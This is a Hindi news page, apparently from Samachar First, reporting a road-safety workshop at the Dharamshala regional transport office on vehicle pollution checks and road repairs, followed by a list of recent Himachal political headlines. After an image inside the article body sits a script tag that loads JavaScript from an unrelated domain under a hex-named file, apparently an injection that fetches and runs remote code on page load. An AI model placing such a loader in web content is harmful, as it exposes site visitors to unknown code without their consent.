Categories: हिमाचल

सड़क सुरक्षा अभियान के अंतर्गत धर्मशाला में कार्यशाला आयोजित

<p>सड़क सुरक्षा माह के अंतर्गत क्षेत्रीय परिवहन अधिकारी कार्यालय में एक कार्यशाला का आयोजन किया जिसकी अध्यक्षता संजय धीमान, क्षेत्रीय परिवहन अधिकारी ने की जिसमें विशेष रूप से वरिष्ठ पर्यावरण अभियंता आर.के.नड्डा और पर्यावरण अभियंता वरूण गुप्ता उपस्थित हुए। कार्यशाला में विभिन्न बस ट्रक यूनियनों के प्रधान, उप-प्रधान और अन्य प्रतिनिधियों ने भाग लिया। डॉ. धीमान ने प्रदूषण से वाहनों में होने वाले वाले नुकसान के बारे में जागरूक किया ताकि वह समय-समय पर अपने वाहनों की जांच सुचारू रूप से करवाते रहे।</p>

<p>इस मौके पर पर्यावरण अभियंता आर.के.नड्डा और वरूण गुप्ता ने भी अपने विचार रखे। उन्होंने गाड़ियों की समय-समय पर जांच करवाने पर बल दिया ताकि प्रदूषण को पर्यावरण में फैलने से रोका जा सके। इस अवसर पर बस मालिक शिव राम, अजय परिहार और जितेंद्र कुमार ने भी अपने विचार रखे। उन्होंने सड़क सुरक्षा अभियान को जन जागरण अभियान बनाने पर बल दिया ताकि आम जनता भी सड़क पर नियमों का पालन न करने वालों को समझाने में अपनी भागीदारी सुनिश्चित कर सके।</p>

<p>उन्होंने सड़कों की दयनीय स्थिति पर भी चर्चा की ताकि इनकी सही समय पर मरम्मत होने से काफी हद तक दुर्घटना को रोका जा सकता है। इससे पूर्व डॉ.धीमान ने कार्यशाला में उपस्थित सभी प्रतिनिधियों का स्वागत किया। परिवहन अधिकारी डॉ. धीमान ने कार्यशाला में सभी का धन्यवाद किया। इस अवसर पर कार्यालय के अधिकारी एवं कर्मचारी भी उपस्थित थे।</p>

<p><img src=”/media/gallery/images/image(2128).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

जनता पेयजल को तरसती रही, राजेंद्र राणा सरकार गिराने की साजिश रचते रहे

-मुख्यमंत्री सुखविंदर सुक्खू ने राणा की गृह पंचायत की पेयजल समस्या सुलझाई -कैप्टन रणजीत सिंह…

3 hours ago

सुजानपुर में भाजपा को कुनबा संभालना हो रहा मुश्किल

मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू की नीतियों में आस्था जता रहे भाजपाई  मतदान की तारीख…

4 hours ago

मुख्य निर्वाचन अधिकारी ने राज्य नोडल अधिकारियों के साथ की मीटिंग

मुख्य निर्वाचन अधिकारी, मनीष गर्ग ने आज यहां सभी राज्य नोडल अधिकारियों को चुनाव व्यय…

4 hours ago

संसदीय क्षेत्रों में 3 और विस उप-चुनावों के लिए 4 नामांकनों की वापसी

निर्वाचन विभाग के एक प्रवक्ता ने आज यहां जानकारी दी कि आगामी लोकसभा तथा विधानसभा…

4 hours ago

मुल्थान जैसे घटनाएं रोकने को गंभीर प्रयास करे प्रदेश सरकार, जांच हो: आनंद शर्मा

धर्मशाला(कांगड़ा), 17 मई: जिला कांगड़ा के दुर्गम क्षेत्र मुल्थान में एक पनबिजली परियोजना की टनल…

19 hours ago

जनसेवा नहीं, धन सेवा के लिए राजनीति कर रहे राजेंद्र राणा: मुख्यमंत्री

सुजानपुर: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने कहा कि सुजानपुर के पूर्व विधायक राजेंद्र राणा…

20 hours ago